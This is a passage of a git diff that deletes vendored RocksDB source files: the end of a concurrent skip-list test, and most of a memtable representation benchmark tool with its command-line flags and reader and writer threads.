-// We want to make sure that with a single writer and multiple
-// concurrent readers (with no synchronization other than when a
-// reader's iterator is created), the reader always observes all the
-// data that was present in the skip list when the iterator was
-// constructor.  Because insertions are happening concurrently, we may
-// also observe new values that were inserted since the iterator was
-// constructed, but we should never miss any values that were present
-// at iterator construction time.
-//
-// We generate multi-part keys:
-//     <key,gen,hash>
-// where:
-//     key is in range [0..K-1]
-//     gen is a generation number for key
-//     hash is hash(key,gen)
-//
-// The insertion code picks a random key, sets gen to be 1 + the last
-// generation number inserted for that key, and sets hash to Hash(key,gen).
-//
-// At the beginning of a read, we snapshot the last inserted
-// generation number for each key.  We then iterate, including random
-// calls to Next() and Seek().  For every key we encounter, we
-// check that it is either expected given the initial snapshot or has
-// been concurrently added since the iterator started.
-class ConcurrentTest {
- public:
-  static const uint32_t K = 8;
-
- private:
-  static uint64_t key(Key key) { return (key >> 40); }
-  static uint64_t gen(Key key) { return (key >> 8) & 0xffffffffu; }
-  static uint64_t hash(Key key) { return key & 0xff; }
-
-  static uint64_t HashNumbers(uint64_t k, uint64_t g) {
-    uint64_t data[2] = {k, g};
-    return Hash(reinterpret_cast<char*>(data), sizeof(data), 0);
-  }
-
-  static Key MakeKey(uint64_t k, uint64_t g) {
-    assert(sizeof(Key) == sizeof(uint64_t));
-    assert(k <= K);  // We sometimes pass K to seek to the end of the skiplist
-    assert(g <= 0xffffffffu);
-    return ((k << 40) | (g << 8) | (HashNumbers(k, g) & 0xff));
-  }
-
-  static bool IsValidKey(Key k) {
-    return hash(k) == (HashNumbers(key(k), gen(k)) & 0xff);
-  }
-
-  static Key RandomTarget(Random* rnd) {
-    switch (rnd->Next() % 10) {
-      case 0:
-        // Seek to beginning
-        return MakeKey(0, 0);
-      case 1:
-        // Seek to end
-        return MakeKey(K, 0);
-      default:
-        // Seek to middle
-        return MakeKey(rnd->Next() % K, 0);
-    }
-  }
-
-  // Per-key generation
-  struct State {
-    std::atomic<int> generation[K];
-    void Set(int k, int v) {
-      generation[k].store(v, std::memory_order_release);
-    }
-    int Get(int k) { return generation[k].load(std::memory_order_acquire); }
-
-    State() {
-      for (unsigned int k = 0; k < K; k++) {
-        Set(k, 0);
-      }
-    }
-  };
-
-  // Current state of the test
-  State current_;
-
-  ConcurrentArena arena_;
-
-  // InlineSkipList is not protected by mu_.  We just use a single writer
-  // thread to modify it.
-  InlineSkipList<TestComparator> list_;
-
- public:
-  ConcurrentTest() : list_(TestComparator(), &arena_) {}
-
-  // REQUIRES: No concurrent calls to WriteStep or ConcurrentWriteStep
-  void WriteStep(Random* rnd) {
-    const uint32_t k = rnd->Next() % K;
-    const int g = current_.Get(k) + 1;
-    const Key new_key = MakeKey(k, g);
-    char* buf = list_.AllocateKey(sizeof(Key));
-    memcpy(buf, &new_key, sizeof(Key));
-    list_.Insert(buf);
-    current_.Set(k, g);
-  }
-
-  // REQUIRES: No concurrent calls for the same k
-  void ConcurrentWriteStep(uint32_t k) {
-    const int g = current_.Get(k) + 1;
-    const Key new_key = MakeKey(k, g);
-    char* buf = list_.AllocateKey(sizeof(Key));
-    memcpy(buf, &new_key, sizeof(Key));
-    list_.InsertConcurrently(buf);
-    ASSERT_EQ(g, current_.Get(k) + 1);
-    current_.Set(k, g);
-  }
-
-  void ReadStep(Random* rnd) {
-    // Remember the initial committed state of the skiplist.
-    State initial_state;
-    for (unsigned int k = 0; k < K; k++) {
-      initial_state.Set(k, current_.Get(k));
-    }
-
-    Key pos = RandomTarget(rnd);
-    InlineSkipList<TestComparator>::Iterator iter(&list_);
-    iter.Seek(Encode(&pos));
-    while (true) {
-      Key current;
-      if (!iter.Valid()) {
-        current = MakeKey(K, 0);
-      } else {
-        current = Decode(iter.key());
-        ASSERT_TRUE(IsValidKey(current)) << current;
-      }
-      ASSERT_LE(pos, current) << "should not go backwards";
-
-      // Verify that everything in [pos,current) was not present in
-      // initial_state.
-      while (pos < current) {
-        ASSERT_LT(key(pos), K) << pos;
-
-        // Note that generation 0 is never inserted, so it is ok if
-        // <*,0,*> is missing.
-        ASSERT_TRUE((gen(pos) == 0U) ||
-                    (gen(pos) > static_cast<uint64_t>(initial_state.Get(
-                                    static_cast<int>(key(pos))))))
-            << "key: " << key(pos) << "; gen: " << gen(pos)
-            << "; initgen: " << initial_state.Get(static_cast<int>(key(pos)));
-
-        // Advance to next key in the valid key space
-        if (key(pos) < key(current)) {
-          pos = MakeKey(key(pos) + 1, 0);
-        } else {
-          pos = MakeKey(key(pos), gen(pos) + 1);
-        }
-      }
-
-      if (!iter.Valid()) {
-        break;
-      }
-
-      if (rnd->Next() % 2) {
-        iter.Next();
-        pos = MakeKey(key(pos), gen(pos) + 1);
-      } else {
-        Key new_target = RandomTarget(rnd);
-        if (new_target > pos) {
-          pos = new_target;
-          iter.Seek(Encode(&new_target));
-        }
-      }
-    }
-  }
-};
-const uint32_t ConcurrentTest::K;
-
-// Simple test that does single-threaded testing of the ConcurrentTest
-// scaffolding.
-TEST_F(InlineSkipTest, ConcurrentReadWithoutThreads) {
-  ConcurrentTest test;
-  Random rnd(test::RandomSeed());
-  for (int i = 0; i < 10000; i++) {
-    test.ReadStep(&rnd);
-    test.WriteStep(&rnd);
-  }
-}
-
-TEST_F(InlineSkipTest, ConcurrentInsertWithoutThreads) {
-  ConcurrentTest test;
-  Random rnd(test::RandomSeed());
-  for (int i = 0; i < 10000; i++) {
-    test.ReadStep(&rnd);
-    uint32_t base = rnd.Next();
-    for (int j = 0; j < 4; ++j) {
-      test.ConcurrentWriteStep((base + j) % ConcurrentTest::K);
-    }
-  }
-}
-
-class TestState {
- public:
-  ConcurrentTest t_;
-  int seed_;
-  std::atomic<bool> quit_flag_;
-  std::atomic<uint32_t> next_writer_;
-
-  enum ReaderState { STARTING, RUNNING, DONE };
-
-  explicit TestState(int s)
-      : seed_(s),
-        quit_flag_(false),
-        state_(STARTING),
-        pending_writers_(0),
-        state_cv_(&mu_) {}
-
-  void Wait(ReaderState s) {
-    mu_.Lock();
-    while (state_ != s) {
-      state_cv_.Wait();
-    }
-    mu_.Unlock();
-  }
-
-  void Change(ReaderState s) {
-    mu_.Lock();
-    state_ = s;
-    state_cv_.Signal();
-    mu_.Unlock();
-  }
-
-  void AdjustPendingWriters(int delta) {
-    mu_.Lock();
-    pending_writers_ += delta;
-    if (pending_writers_ == 0) {
-      state_cv_.Signal();
-    }
-    mu_.Unlock();
-  }
-
-  void WaitForPendingWriters() {
-    mu_.Lock();
-    while (pending_writers_ != 0) {
-      state_cv_.Wait();
-    }
-    mu_.Unlock();
-  }
-
- private:
-  port::Mutex mu_;
-  ReaderState state_;
-  int pending_writers_;
-  port::CondVar state_cv_;
-};
-
-static void ConcurrentReader(void* arg) {
-  TestState* state = reinterpret_cast<TestState*>(arg);
-  Random rnd(state->seed_);
-  int64_t reads = 0;
-  state->Change(TestState::RUNNING);
-  while (!state->quit_flag_.load(std::memory_order_acquire)) {
-    state->t_.ReadStep(&rnd);
-    ++reads;
-  }
-  state->Change(TestState::DONE);
-}
-
-static void ConcurrentWriter(void* arg) {
-  TestState* state = reinterpret_cast<TestState*>(arg);
-  uint32_t k = state->next_writer_++ % ConcurrentTest::K;
-  state->t_.ConcurrentWriteStep(k);
-  state->AdjustPendingWriters(-1);
-}
-
-static void RunConcurrentRead(int run) {
-  const int seed = test::RandomSeed() + (run * 100);
-  Random rnd(seed);
-  const int N = 1000;
-  const int kSize = 1000;
-  for (int i = 0; i < N; i++) {
-    if ((i % 100) == 0) {
-      fprintf(stderr, "Run %d of %d\n", i, N);
-    }
-    TestState state(seed + 1);
-    Env::Default()->SetBackgroundThreads(1);
-    Env::Default()->Schedule(ConcurrentReader, &state);
-    state.Wait(TestState::RUNNING);
-    for (int k = 0; k < kSize; ++k) {
-      state.t_.WriteStep(&rnd);
-    }
-    state.quit_flag_.store(true, std::memory_order_release);
-    state.Wait(TestState::DONE);
-  }
-}
-
-static void RunConcurrentInsert(int run, int write_parallelism = 4) {
-  Env::Default()->SetBackgroundThreads(1 + write_parallelism,
-                                       Env::Priority::LOW);
-  const int seed = test::RandomSeed() + (run * 100);
-  Random rnd(seed);
-  const int N = 1000;
-  const int kSize = 1000;
-  for (int i = 0; i < N; i++) {
-    if ((i % 100) == 0) {
-      fprintf(stderr, "Run %d of %d\n", i, N);
-    }
-    TestState state(seed + 1);
-    Env::Default()->Schedule(ConcurrentReader, &state);
-    state.Wait(TestState::RUNNING);
-    for (int k = 0; k < kSize; k += write_parallelism) {
-      state.next_writer_ = rnd.Next();
-      state.AdjustPendingWriters(write_parallelism);
-      for (int p = 0; p < write_parallelism; ++p) {
-        Env::Default()->Schedule(ConcurrentWriter, &state);
-      }
-      state.WaitForPendingWriters();
-    }
-    state.quit_flag_.store(true, std::memory_order_release);
-    state.Wait(TestState::DONE);
-  }
-}
-
-TEST_F(InlineSkipTest, ConcurrentRead1) { RunConcurrentRead(1); }
-TEST_F(InlineSkipTest, ConcurrentRead2) { RunConcurrentRead(2); }
-TEST_F(InlineSkipTest, ConcurrentRead3) { RunConcurrentRead(3); }
-TEST_F(InlineSkipTest, ConcurrentRead4) { RunConcurrentRead(4); }
-TEST_F(InlineSkipTest, ConcurrentRead5) { RunConcurrentRead(5); }
-TEST_F(InlineSkipTest, ConcurrentInsert1) { RunConcurrentInsert(1); }
-TEST_F(InlineSkipTest, ConcurrentInsert2) { RunConcurrentInsert(2); }
-TEST_F(InlineSkipTest, ConcurrentInsert3) { RunConcurrentInsert(3); }
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/memtable/memtablerep_bench.cc b/thirdparty/rocksdb/memtable/memtablerep_bench.cc
deleted file mode 100644
index 63a0201..0000000
--- a/thirdparty/rocksdb/memtable/memtablerep_bench.cc
+++ /dev/null
@@ -1,698 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <gflags/gflags.h>
-
-#include <atomic>
-#include <iostream>
-#include <memory>
-#include <thread>
-#include <type_traits>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/memtable.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "util/arena.h"
-#include "util/mutexlock.h"
-#include "util/stop_watch.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::RegisterFlagValidator;
-using GFLAGS::SetUsageMessage;
-
-DEFINE_string(benchmarks, "fillrandom",
-              "Comma-separated list of benchmarks to run. Options:\n"
-              "\tfillrandom             -- write N random values\n"
-              "\tfillseq                -- write N values in sequential order\n"
-              "\treadrandom             -- read N values in random order\n"
-              "\treadseq                -- scan the DB\n"
-              "\treadwrite              -- 1 thread writes while N - 1 threads "
-              "do random\n"
-              "\t                          reads\n"
-              "\tseqreadwrite           -- 1 thread writes while N - 1 threads "
-              "do scans\n");
-
-DEFINE_string(memtablerep, "skiplist",
-              "Which implementation of memtablerep to use. See "
-              "include/memtablerep.h for\n"
-              "  more details. Options:\n"
-              "\tskiplist            -- backed by a skiplist\n"
-              "\tvector              -- backed by an std::vector\n"
-              "\thashskiplist        -- backed by a hash skip list\n"
-              "\thashlinklist        -- backed by a hash linked list\n"
-              "\tcuckoo              -- backed by a cuckoo hash table");
-
-DEFINE_int64(bucket_count, 1000000,
-             "bucket_count parameter to pass into NewHashSkiplistRepFactory or "
-             "NewHashLinkListRepFactory");
-
-DEFINE_int32(
-    hashskiplist_height, 4,
-    "skiplist_height parameter to pass into NewHashSkiplistRepFactory");
-
-DEFINE_int32(
-    hashskiplist_branching_factor, 4,
-    "branching_factor parameter to pass into NewHashSkiplistRepFactory");
-
-DEFINE_int32(
-    huge_page_tlb_size, 0,
-    "huge_page_tlb_size parameter to pass into NewHashLinkListRepFactory");
-
-DEFINE_int32(bucket_entries_logging_threshold, 4096,
-             "bucket_entries_logging_threshold parameter to pass into "
-             "NewHashLinkListRepFactory");
-
-DEFINE_bool(if_log_bucket_dist_when_flash, true,
-            "if_log_bucket_dist_when_flash parameter to pass into "
-            "NewHashLinkListRepFactory");
-
-DEFINE_int32(
-    threshold_use_skiplist, 256,
-    "threshold_use_skiplist parameter to pass into NewHashLinkListRepFactory");
-
-DEFINE_int64(
-    write_buffer_size, 256,
-    "write_buffer_size parameter to pass into NewHashCuckooRepFactory");
-
-DEFINE_int64(
-    average_data_size, 64,
-    "average_data_size parameter to pass into NewHashCuckooRepFactory");
-
-DEFINE_int64(
-    hash_function_count, 4,
-    "hash_function_count parameter to pass into NewHashCuckooRepFactory");
-
-DEFINE_int32(
-    num_threads, 1,
-    "Number of concurrent threads to run. If the benchmark includes writes,\n"
-    "then at most one thread will be a writer");
-
-DEFINE_int32(num_operations, 1000000,
-             "Number of operations to do for write and random read benchmarks");
-
-DEFINE_int32(num_scans, 10,
-             "Number of times for each thread to scan the memtablerep for "
-             "sequential read "
-             "benchmarks");
-
-DEFINE_int32(item_size, 100, "Number of bytes each item should be");
-
-DEFINE_int32(prefix_length, 8,
-             "Prefix length to pass into NewFixedPrefixTransform");
-
-/* VectorRep settings */
-DEFINE_int64(vectorrep_count, 0,
-             "Number of entries to reserve on VectorRep initialization");
-
-DEFINE_int64(seed, 0,
-             "Seed base for random number generators. "
-             "When 0 it is deterministic.");
-
-namespace rocksdb {
-
-namespace {
-struct CallbackVerifyArgs {
-  bool found;
-  LookupKey* key;
-  MemTableRep* table;
-  InternalKeyComparator* comparator;
-};
-}  // namespace
-
-// Helper for quickly generating random data.
-class RandomGenerator {
- private:
-  std::string data_;
-  unsigned int pos_;
-
- public:
-  RandomGenerator() {
-    Random rnd(301);
-    auto size = (unsigned)std::max(1048576, FLAGS_item_size);
-    test::RandomString(&rnd, size, &data_);
-    pos_ = 0;
-  }
-
-  Slice Generate(unsigned int len) {
-    assert(len <= data_.size());
-    if (pos_ + len > data_.size()) {
-      pos_ = 0;
-    }
-    pos_ += len;
-    return Slice(data_.data() + pos_ - len, len);
-  }
-};
-
-enum WriteMode { SEQUENTIAL, RANDOM, UNIQUE_RANDOM };
-
-class KeyGenerator {
- public:
-  KeyGenerator(Random64* rand, WriteMode mode, uint64_t num)
-      : rand_(rand), mode_(mode), num_(num), next_(0) {
-    if (mode_ == UNIQUE_RANDOM) {
-      // NOTE: if memory consumption of this approach becomes a concern,
-      // we can either break it into pieces and only random shuffle a section
-      // each time. Alternatively, use a bit map implementation
-      // (https://reviews.facebook.net/differential/diff/54627/)
-      values_.resize(num_);
-      for (uint64_t i = 0; i < num_; ++i) {
-        values_[i] = i;
-      }
-      std::shuffle(
-          values_.begin(), values_.end(),
-          std::default_random_engine(static_cast<unsigned int>(FLAGS_seed)));
-    }
-  }
-
-  uint64_t Next() {
-    switch (mode_) {
-      case SEQUENTIAL:
-        return next_++;
-      case RANDOM:
-        return rand_->Next() % num_;
-      case UNIQUE_RANDOM:
-        return values_[next_++];
-    }
-    assert(false);
-    return std::numeric_limits<uint64_t>::max();
-  }
-
- private:
-  Random64* rand_;
-  WriteMode mode_;
-  const uint64_t num_;
-  uint64_t next_;
-  std::vector<uint64_t> values_;
-};
-
-class BenchmarkThread {
- public:
-  explicit BenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                           uint64_t* bytes_written, uint64_t* bytes_read,
-                           uint64_t* sequence, uint64_t num_ops,
-                           uint64_t* read_hits)
-      : table_(table),
-        key_gen_(key_gen),
-        bytes_written_(bytes_written),
-        bytes_read_(bytes_read),
-        sequence_(sequence),
-        num_ops_(num_ops),
-        read_hits_(read_hits) {}
-
-  virtual void operator()() = 0;
-  virtual ~BenchmarkThread() {}
-
- protected:
-  MemTableRep* table_;
-  KeyGenerator* key_gen_;
-  uint64_t* bytes_written_;
-  uint64_t* bytes_read_;
-  uint64_t* sequence_;
-  uint64_t num_ops_;
-  uint64_t* read_hits_;
-  RandomGenerator generator_;
-};
-
-class FillBenchmarkThread : public BenchmarkThread {
- public:
-  FillBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                      uint64_t* bytes_written, uint64_t* bytes_read,
-                      uint64_t* sequence, uint64_t num_ops, uint64_t* read_hits)
-      : BenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                        num_ops, read_hits) {}
-
-  void FillOne() {
-    char* buf = nullptr;
-    auto internal_key_size = 16;
-    auto encoded_len =
-        FLAGS_item_size + VarintLength(internal_key_size) + internal_key_size;
-    KeyHandle handle = table_->Allocate(encoded_len, &buf);
-    assert(buf != nullptr);
-    char* p = EncodeVarint32(buf, internal_key_size);
-    auto key = key_gen_->Next();
-    EncodeFixed64(p, key);
-    p += 8;
-    EncodeFixed64(p, ++(*sequence_));
-    p += 8;
-    Slice bytes = generator_.Generate(FLAGS_item_size);
-    memcpy(p, bytes.data(), FLAGS_item_size);
-    p += FLAGS_item_size;
-    assert(p == buf + encoded_len);
-    table_->Insert(handle);
-    *bytes_written_ += encoded_len;
-  }
-
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      FillOne();
-    }
-  }
-};
-
-class ConcurrentFillBenchmarkThread : public FillBenchmarkThread {
- public:
-  ConcurrentFillBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                                uint64_t* bytes_written, uint64_t* bytes_read,
-                                uint64_t* sequence, uint64_t num_ops,
-                                uint64_t* read_hits,
-                                std::atomic_int* threads_done)
-      : FillBenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                            num_ops, read_hits) {
-    threads_done_ = threads_done;
-  }
-
-  void operator()() override {
-    // # of read threads will be total threads - write threads (always 1). Loop
-    // while all reads complete.
-    while ((*threads_done_).load() < (FLAGS_num_threads - 1)) {
-      FillOne();
-    }
-  }
-
- private:
-  std::atomic_int* threads_done_;
-};
-
-class ReadBenchmarkThread : public BenchmarkThread {
- public:
-  ReadBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                      uint64_t* bytes_written, uint64_t* bytes_read,
-                      uint64_t* sequence, uint64_t num_ops, uint64_t* read_hits)
-      : BenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                        num_ops, read_hits) {}
-
-  static bool callback(void* arg, const char* entry) {
-    CallbackVerifyArgs* callback_args = static_cast<CallbackVerifyArgs*>(arg);
-    assert(callback_args != nullptr);
-    uint32_t key_length;
-    const char* key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-    if ((callback_args->comparator)
-            ->user_comparator()
-            ->Equal(Slice(key_ptr, key_length - 8),
-                    callback_args->key->user_key())) {
-      callback_args->found = true;
-    }
-    return false;
-  }
-
-  void ReadOne() {
-    std::string user_key;
-    auto key = key_gen_->Next();
-    PutFixed64(&user_key, key);
-    LookupKey lookup_key(user_key, *sequence_);
-    InternalKeyComparator internal_key_comp(BytewiseComparator());
-    CallbackVerifyArgs verify_args;
-    verify_args.found = false;
-    verify_args.key = &lookup_key;
-    verify_args.table = table_;
-    verify_args.comparator = &internal_key_comp;
-    table_->Get(lookup_key, &verify_args, callback);
-    if (verify_args.found) {
-      *bytes_read_ += VarintLength(16) + 16 + FLAGS_item_size;
-      ++*read_hits_;
-    }
-  }
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      ReadOne();
-    }
-  }
-};
-
-class SeqReadBenchmarkThread : public BenchmarkThread {
- public:
-  SeqReadBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                         uint64_t* bytes_written, uint64_t* bytes_read,
-                         uint64_t* sequence, uint64_t num_ops,
-                         uint64_t* read_hits)
-      : BenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                        num_ops, read_hits) {}
-
-  void ReadOneSeq() {
-    std::unique_ptr<MemTableRep::Iterator> iter(table_->GetIterator());
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      // pretend to read the value
-      *bytes_read_ += VarintLength(16) + 16 + FLAGS_item_size;
-    }
-    ++*read_hits_;
-  }
-
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      { ReadOneSeq(); }
-    }
-  }
-};
-
-class ConcurrentReadBenchmarkThread : public ReadBenchmarkThread {
- public:
-  ConcurrentReadBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                                uint64_t* bytes_written, uint64_t* bytes_read,
-                                uint64_t* sequence, uint64_t num_ops,
-                                uint64_t* read_hits,
-                                std::atomic_int* threads_done)
-      : ReadBenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                            num_ops, read_hits) {
-    threads_done_ = threads_done;
-  }
-
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      ReadOne();
-    }
-    ++*threads_done_;
-  }
-
- private:
-  std::atomic_int* threads_done_;
-};
-
-class SeqConcurrentReadBenchmarkThread : public SeqReadBenchmarkThread {
- public:
-  SeqConcurrentReadBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                                   uint64_t* bytes_written,
-                                   uint64_t* bytes_read, uint64_t* sequence,
-                                   uint64_t num_ops, uint64_t* read_hits,
-                                   std::atomic_int* threads_done)
-      : SeqReadBenchmarkThread(table, key_gen, bytes_written, bytes_read,
-                               sequence, num_ops, read_hits) {
-    threads_done_ = threads_done;
-  }
-
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      ReadOneSeq();
-    }
-    ++*threads_done_;
-  }
-
- private:
-  std::atomic_int* threads_done_;
-};
-
-class Benchmark {
- public:
-  explicit Benchmark(MemTableRep* table, KeyGenerator* key_gen,
-                     uint64_t* sequence, uint32_t num_threads)
-      : table_(table),
-        key_gen_(key_gen),
-        sequence_(sequence),
-        num_threads_(num_threads) {}
-
-  virtual ~Benchmark() {}
-  virtual void Run() {
-    std::cout << "Number of threads: " << num_threads_ << std::endl;
-    std::vector<port::Thread> threads;
-    uint64_t bytes_written = 0;
-    uint64_t bytes_read = 0;
-    uint64_t read_hits = 0;
-    StopWatchNano timer(Env::Default(), true);
-    RunThreads(&threads, &bytes_written, &bytes_read, true, &read_hits);
-    auto elapsed_time = static_cast<double>(timer.ElapsedNanos() / 1000);
-    std::cout << "Elapsed time: " << static_cast<int>(elapsed_time) << " us"
-              << std::endl;
-
-    if (bytes_written > 0) {
-      auto MiB_written = static_cast<double>(bytes_written) / (1 << 20);
-      auto write_throughput = MiB_written / (elapsed_time / 1000000);
-      std::cout << "Total bytes written: " << MiB_written << " MiB"
-                << std::endl;
-      std::cout << "Write throughput: " << write_throughput << " MiB/s"
-                << std::endl;
-      auto us_per_op = elapsed_time / num_write_ops_per_thread_;
-      std::cout << "write us/op: " << us_per_op << std::endl;
-    }
-    if (bytes_read > 0) {
-      auto MiB_read = static_cast<double>(bytes_read) / (1 << 20);
-      auto read_throughput = MiB_read / (elapsed_time / 1000000);
-      std::cout << "Total bytes read: " << MiB_read << " MiB" << std::endl;
-      std::cout << "Read throughput: " << read_throughput << " MiB/s"
-                << std::endl;
-      auto us_per_op = elapsed_time / num_read_ops_per_thread_;
-      std::cout << "read us/op: " << us_per_op << std::endl;
-    }
-  }
-
-  virtual void RunThreads(std::vector<port::Thread>* threads,
-                          uint64_t* bytes_written, uint64_t* bytes_read,
-                          bool write, uint64_t* read_hits) = 0;
-
- protected:
-  MemTableRep* table_;
-  KeyGenerator* key_gen_;
-  uint64_t* sequence_;
-  uint64_t num_write_ops_per_thread_;
-  uint64_t num_read_ops_per_thread_;
-  const uint32_t num_threads_;
-};
-
-class FillBenchmark : public Benchmark {
- public:
-  explicit FillBenchmark(MemTableRep* table, KeyGenerator* key_gen,
-                         uint64_t* sequence)
-      : Benchmark(table, key_gen, sequence, 1) {
-    num_write_ops_per_thread_ = FLAGS_num_operations;
-  }
-
-  void RunThreads(std::vector<port::Thread>* threads, uint64_t* bytes_written,
-                  uint64_t* bytes_read, bool write,
-                  uint64_t* read_hits) override {
-    FillBenchmarkThread(table_, key_gen_, bytes_written, bytes_read, sequence_,
-                        num_write_ops_per_thread_, read_hits)();
-  }
-};
-
-class ReadBenchmark : public Benchmark {
- public:
-  explicit ReadBenchmark(MemTableRep* table, KeyGenerator* key_gen,
-                         uint64_t* sequence)
-      : Benchmark(table, key_gen, sequence, FLAGS_num_threads) {
-    num_read_ops_per_thread_ = FLAGS_num_operations / FLAGS_num_threads;
-  }
-
-  void RunThreads(std::vector<port::Thread>* threads, uint64_t* bytes_written,
-                  uint64_t* bytes_read, bool write,
-                  uint64_t* read_hits) override {
-    for (int i = 0; i < FLAGS_num_threads; ++i) {
-      threads->emplace_back(
-          ReadBenchmarkThread(table_, key_gen_, bytes_written, bytes_read,
-                              sequence_, num_read_ops_per_thread_, read_hits));
-    }
-    for (auto& thread : *threads) {
-      thread.join();
-    }
-    std::cout << "read hit%: "
-              << (static_cast<double>(*read_hits) / FLAGS_num_operations) * 100
-              << std::endl;
-  }
-};
-
-class SeqReadBenchmark : public Benchmark {
- public:
-  explicit SeqReadBenchmark(MemTableRep* table, uint64_t* sequence)
-      : Benchmark(table, nullptr, sequence, FLAGS_num_threads) {
-    num_read_ops_per_thread_ = FLAGS_num_scans;
-  }
-
-  void RunThreads(std::vector<port::Thread>* threads, uint64_t* bytes_written,
-                  uint64_t* bytes_read, bool write,
-                  uint64_t* read_hits) override {
-    for (int i = 0; i < FLAGS_num_threads; ++i) {
-      threads->emplace_back(SeqReadBenchmarkThread(
-          table_, key_gen_, bytes_written, bytes_read, sequence_,
-          num_read_ops_per_thread_, read_hits));
-    }
-    for (auto& thread : *threads) {
-      thread.join();
-    }
-  }
-};
-
-template <class ReadThreadType>
-class ReadWriteBenchmark : public Benchmark {
- public:
-  explicit ReadWriteBenchmark(MemTableRep* table, KeyGenerator* key_gen,
-                              uint64_t* sequence)
-      : Benchmark(table, key_gen, sequence, FLAGS_num_threads) {
-    num_read_ops_per_thread_ =
-        FLAGS_num_threads <= 1
-            ? 0
-            : (FLAGS_num_operations / (FLAGS_num_threads - 1));
-    num_write_ops_per_thread_ = FLAGS_num_operations;
-  }
-
-  void RunThreads(std::vector<port::Thread>* threads, uint64_t* bytes_written,
-                  uint64_t* bytes_read, bool write,
-                  uint64_t* read_hits) override {
-    std::atomic_int threads_done;
-    threads_done.store(0);
-    threads->emplace_back(ConcurrentFillBenchmarkThread(
-        table_, key_gen_, bytes_written, bytes_read, sequence_,
-        num_write_ops_per_thread_, read_hits, &threads_done));
-    for (int i = 1; i < FLAGS_num_threads; ++i) {
-      threads->emplace_back(
-          ReadThreadType(table_, key_gen_, bytes_written, bytes_read, sequence_,
-                         num_read_ops_per_thread_, read_hits, &threads_done));
-    }
-    for (auto& thread : *threads) {
-      thread.join();
-    }
-  }
-};
-
-}  // namespace rocksdb
-
-void PrintWarnings() {
-#if defined(__GNUC__) && !defined(__OPTIMIZE__)
-  fprintf(stdout,
-          "WARNING: Optimization is disabled: benchmarks unnecessarily slow\n");
-#endif
-#ifndef NDEBUG
-  fprintf(stdout,
-          "WARNING: Assertions are enabled; benchmarks unnecessarily slow\n");
-#endif
-}
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  PrintWarnings();
-
-  rocksdb::Options options;
-
-  std::unique_ptr<rocksdb::MemTableRepFactory> factory;
-  if (FLAGS_memtablerep == "skiplist") {
-    factory.reset(new rocksdb::SkipListFactory);
-#ifndef ROCKSDB_LITE
-  } else if (FLAGS_memtablerep == "vector") {
-    factory.reset(new rocksdb::VectorRepFactory);
-  } else if (FLAGS_memtablerep == "hashskiplist") {
-    factory.reset(rocksdb::NewHashSkipListRepFactory(
-        FLAGS_bucket_count, FLAGS_hashskiplist_height,
-        FLAGS_hashskiplist_branching_factor));
-    options.prefix_extractor.reset(
-        rocksdb::NewFixedPrefixTransform(FLAGS_prefix_length));
-  } else if (FLAGS_memtablerep == "hashlinklist") {
-    factory.reset(rocksdb::NewHashLinkListRepFactory(
-        FLAGS_bucket_count, FLAGS_huge_page_tlb_size,
-        FLAGS_bucket_entries_logging_threshold,
-        FLAGS_if_log_bucket_dist_when_flash, FLAGS_threshold_use_skiplist));
-    options.prefix_extractor.reset(
-        rocksdb::NewFixedPrefixTransform(FLAGS_prefix_length));
-  } else if (FLAGS_memtablerep == "cuckoo") {
-    factory.reset(rocksdb::NewHashCuckooRepFactory(
-        FLAGS_write_buffer_size, FLAGS_average_data_size,
-        static_cast<uint32_t>(FLAGS_hash_function_count)));
-    options.prefix_extractor.reset(
-        rocksdb::NewFixedPrefixTransform(FLAGS_prefix_length));
-#endif  // ROCKSDB_LITE
-  } else {
-    fprintf(stdout, "Unknown memtablerep: %s\n", FLAGS_memtablerep.c_str());
-    exit(1);
-  }
-
-  rocksdb::InternalKeyComparator internal_key_comp(
-      rocksdb::BytewiseComparator());
-  rocksdb::MemTable::KeyComparator key_comp(internal_key_comp);
